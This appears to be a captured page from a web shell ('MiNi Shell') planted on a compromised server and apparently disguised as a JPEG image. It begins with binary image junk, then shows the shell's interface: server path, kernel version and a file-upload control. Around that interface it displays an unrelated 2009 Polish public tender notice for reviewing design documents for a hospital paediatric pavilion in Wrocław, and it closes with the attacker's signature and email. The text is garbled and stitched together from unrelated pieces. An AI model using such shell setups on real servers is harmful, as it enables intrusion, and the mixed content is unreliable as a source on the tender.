JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090130/31437-N-2009.html

<p class="kh_header"><b>Wrocław: Wykonanie koreferatu do dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego niezbędnych do realizacji robót budowlanych w ramach realizacji zadania inwestycyjnego pn.:Budowa pawilonu pediatrycznego na terenie Wojewódzkiego Szpitala Specjalistycznego im. J. Gromkowskiego we Wrocławiu</b><br>
<b>Numer ogłoszenia: 31437 - 2009; data zamieszczenia: 30.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Dolnośląskie - Urząd Marszałkowski Województwa Dolnośląskiego , ul. Wybrzeże J. Słowackiego 12-14, 50-411 Wrocław, woj. dolnośląskie, tel. 071 7769397, faks 071 7769141, 7769702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie koreferatu do dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego niezbędnych do realizacji robót budowlanych w ramach realizacji zadania inwestycyjnego pn.:Budowa pawilonu pediatrycznego na terenie Wojewódzkiego Szpitala Specjalistycznego im. J. Gromkowskiego we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie koreferatu do dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego wykonanych na potrzeby realizacji zadania inwestycyjnego pn.:Budowa pawilonu pediatrycznego na terenie Wojewódzkiego Szpitala Specjalistycznego im. J. Gromkowskiego we Wrocławiu, obejmującego:
a)sprawdzenie w zakresie projektów wykonawczych:
-zgodności z programem funkcjonalno - użytkowym, 
-zgodności z decyzją o lokalizacji inwestycji celu publicznego,
-zgodności z wymaganiami prawa budowlanego oraz innymi obowiązującymi przepisami, w tym przepisami wynikającymi z:
rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75 poz. 690) ze szczególnym uwzględnieniem zgodności dokumentacji projektowej z polskimi normami, wymienionymi w załączniku nr 1 do wskazanego wyżej rozporządzenia, 
rozporządzenia Ministra Zdrowia z dnia 10 listopada 2006 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. Nr 213 poz. 1568 ze zm.)
przepisami dotyczącymi ochrony środowiska, 
przepisami dotyczącymi bezpieczeństwa i ochrony przeciwpożarowej, BHP, ergonomii pracy itp.
-zgodności z zasadami współczesnej wiedzy technicznej.
-części obliczeniowej dla wszystkich branż, a w szczególności poprawności przyjętych obciążeń, schematów, obliczeń statycznych i wytrzymałościowych, obliczeń cieplno - wilgotnościowych i innych, doboru przyjętych rozwiązań materiałowych,
-części rysunkowej, a w szczególności następujących elementów: poprawność koordynacji branżowej, poprawność wykonania tabel zestawieniowych, opisy materiałów, poprawność wymiarowania, metryki rysunków itp.,
b)sprawdzenie w zakresie kosztorysu inwestorskiego:
-czy kosztorys spełnia wymogi rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym,
-poprawności przyjętych pozycji katalogowych w poszczególnych pozycjach kosztorysowych,
-ilości przyjętych jednostek przedmiarowych, co oznacza również sprawdzenie poprawności wykonania przedmiaru kosztorysowego,
-poprawności przyjętych cen jednostkowych R, M, S (lub cen scalonych) oraz narzutów dla poszczególnych pozycji kosztorysowych,
-kompletności opracowania,
-poprawności obliczeń rachunkowych w kosztorysie.
c)sprawdzenie w zakresie przedmiaru robót:
-kompletności opracowania, a w szczególności czy wszystkie roboty budowlane określone w projektach wykonawczych zostały ujęte w przedmiarze robót,
-czy przedmiar robót spełnia wymagania określone obowiązującymi przepisami w zakresie zamówień publicznych w części dotyczącej poprawnego i kompletnego opisu przedmiotu zamówienia na roboty budowlane,
-czy w przedmiarze robót nie występują pozycje opisujące roboty budowlane nie będące robotami podstawowymi określonymi w rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (np. pomiary geodezyjne, rusztowania, transport gruzu, utylizacja odpadów, zagospodarowanie i organizacja terenu budowy itp.).
d)sprawdzenie w zakresie specyfikacji technicznej wykonania i odbioru robót budowlanych:
-kompletności opracowania,
-czy jednostki obmiarowe podane w pozycjach przedmiaru robót są zgodne z jednostkami wskazanymi w STWiORB,
-czy wszystkie materiały budowlane oraz technologie opisane w projektach wykonawczych zostały uwzględnione w STWiORB,
-czy STWiORB spełnia wymogi rozporządzenia w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego.
e)podsumowanie wykonanych prac sprawdzających oraz wnioski dla Zamawiającego obejmujące:
-ocenę poprawności sporządzonej dokumentacji,
-wskazanie zagrożeń, jakie powstaną przy realizacji projektu i czy można te ewentualne zagrożenia usunąć w trybie nadzoru autorskiego,
-informację, czy na podstawie sprawdzanej dokumentacji można przeprowadzić poprawne postępowanie o zamówienie robót budowlanych,
-inne uwagi i konkluzje mające znaczenie dla projektu.
2.Przedmiotem zamówienia objmuje takze (w razie potrzeby) dokonanie ponownej weryfikacji dokumentacji projektowej uzupełnionej (poprawionej) przez wykonawcę projektu o wnioski wynikające z koreferatu stanowiącego przedmiot zamówienia  wraz z wykazem nieusuniętych błędów oraz określeniem czy mają one znaczenie istotne czy nieistotne dla realizacji projektu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.21.00.00-3, 71.24.10.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie wymaga sie wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie niniejszego zamówienia mogą się ubiegać wykonawcy, którzy:
1.1posiadają uprawnienia niezbędne do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, tj.:
a)w zakresie doświadczenia zawodowego: w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności Wykonawcy jest krótszy - w tym okresie - Wykonawca wykonał usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, tj.: 
usługi polegające na wykonaniu co najmniej trzech dokumentacji projektowych lub koreferatów do dokumentacji projektowej dotyczącej obiektu budowlanego, przewidzianego na podstawie Rozporządzenia Rady Ministrów z dnia 30.12.1999 r. w sprawie Polskiej Klasyfikacji Obiektów Budowlanych (PKOB) (Dz. U. z 1999r. Nr 112 poz. 1316 ze zm.) do sekcji 1, dział 12 Polskiej Klasyfikacji Obiektów Budowlanych, o kubaturze nie mniejszej niż 15000 m3, w tym przynajmniej jednej dokumentacji projektowej lub koreferatu do dokumentacji projektowej dotyczącej obiektu budowlanego, przewidzianego na podstawie Rozporządzenia Rady Ministrów z dnia 30.12.1999 r. w sprawie PKOB do sekcji 1, dział 12, grupa 126, klasa 1264 w zakresie: budynków instytucji świadczących usługi medyczne i chirurgiczne, szpitali długoterminowego lecznictwa, szpitali psychiatrycznych, szpitali klinicznych, szpitali więziennych i wojskowych.
b)w zakresie osób i/lub podmiotów pozostających do dyspozycji Wykonawcy, Wykonawca winien dysponować:
b1) do pełnienia funkcji kierownika zespołu wykonującego koreferat - osobą legitymującą się aktualnymi uprawnieniami do projektowania w branży architektonicznej bez ograniczeń oraz doświadczeniem w realizacji usług projektowych polegającym na wykonaniu przynajmniej jednego projektu budowlanego dla obiektu zaliczonego na podstawie Rozporządzenia Rady Ministrów z dnia 30.12.1999 r. w sprawie Polskiej Klasyfikacji Obiektów Budowlanych (PKOB) (Dz.U.99.112.1316 ze zm.) do sekcji 1, dział 12 Polskiej Klasyfikacji Obiektów Budowlanych, o kubaturze nie mniejszej niż 15.000m3,
b2) do pełnienia funkcji projektantów branżowych, wchodzących w skład zespołu wykonującego koreferat do dokumentacji projektowej - osobami legitymującymi się aktualnymi uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie projektowania w branżach:
 -konstrukcyjno - budowlanej,
-instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych i wentylacyjnych oraz gazowych,
-elektrycznej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
-drogowej.
b3) do pełnienia funkcji technologa, wchodzącego w skład zespołu wykonującego koreferat do dokumentacji projektowej - osobą legitymującą się co najmniej trzema opracowaniami technologii obiektów (lub ich części pełniących funkcje lecznicze, np. oddział, izba przyjęć, blok operacyjny) zakwalifikowanych zgodnie z rozporządzeniem Rady Ministrów z dn. 30.12.1999 r. w sprawie polskiej Klasyfikacji Obiektów Budowlanych (Dz. U. z 1999 r., Nr 112, poz. 1316 ze zm.) do sekcji I, działu 12, grupy 126, klasy 1264 w zakresie: budynków instytucji świadczących usługi medyczne i chirurgiczne, szpitali długoterminowego lecznictwa, szpitali psychiatrycznych, szpitali klinicznych, szpitali więziennych i wojskowych.
Uwaga: Warunki określone w punktach b1) - b3) będą spełnione również w przypadku Wykonawców, którzy przedstawią pisemne zobowiązanie(a) innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
1.3 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
1.4 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o zamówienie.
3.Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą  spełnia-nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w rozdziale VI SIWZ. 
4.Zamawiający wzywa do uzupełnienia oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu na zasadach określonych art. 26 ust. 3 Ustawy Pzp.
5.Nie spełnienie któregokolwiek z ww. warunków udziału w postępowaniu skutkować będzie wykluczeniem wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 Ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I.1.Oświadczenie wykonawcy o spełnianiu warunków podmiotowych na podstawie 
art. 22 (wzór oświadczenia stanowi załącznik nr 2 do SIWZ). 
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
3.Wykaz usług, o których mowa w rozdziale V pkt. 1.2 lit. a) SIWZ, wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich zakresu oraz daty i miejsca wykonania, sporządzonego według wzoru określonego w załączniku nr 6 do SIWZ.
4.Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wymienionych w rozdziale V pkt. 1.2 lit. b) SIWZ, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnymi do wykonania zamówienia, sporządzonego według wzoru określonego w załączniku nr 5 do SIWZ, a jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował na podstawie porozumienia z innymi podmiotami - również pisemne zobowiązanie tych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
5.Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, tj. aktualne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie projektowania, wystawione dla osób wskazanych w rozdziale V pkt. 1.2 lit. b1) oraz b2) SIWZ oraz aktualne zaświadczenie dla tych osób o przynależności do właściwych izb zawodowych, zgodnie z ustawą z dnia 15 grudnia 2000r.o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U.z 2001 r. Nr 5 poz. 42 ze zm.). 
I.2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa:
1) zamiast dokumentów, o których mowa w rozdz. VI.1 pkt 2 SIWZ dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, (powinny być wystawione nie wcześniej niż, 6 miesięcy przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia.). Dokumenty, są składane w formie oryginału lub kopii poświadczonej przez wykonawcę za zgodność  z oryginałem.
I.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego
1.Wykonawcy wspólnie ubiegający się o niniejsze zamówienie ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu lub do reprezentowania ich w niniejszym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2.Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
3.Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed zawarciem umowy o realizację zamówienia są zobowiązani przedłożyć Zamawiającemu umowę regulującą współpracę tych Wykonawców. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowne porozumienie (umowę) zawierające w swojej treści co najmniej następujące postanowienia:
a/zawiązania porozumienia co najmniej na czas nie krótszy niż czas trwania umowy,
b/wskazanie Pełnomocnika,
c/zapis o wspólnej i solidarnej odpowiedzialności w zakresie realizowanego zamówienia,
d/zakaz zmiany Partnerów (Wykonawców) wspólnie realizujących dane zamówienie publiczne w trakcie jego obowiązywania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.umwd.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Dolnośląskiego we Wrocławiu, Wydział Zamówień Publicznych, pokój 104, ul.Mazowiecka 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2009 godzina 11:00, miejsce: Urząd Marszałkowski Województwa Dolnośląskiego we Wrocławiu, Wybrzeże J.Słowackiego 12-14, 50-411 Wrocław, pok.101.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com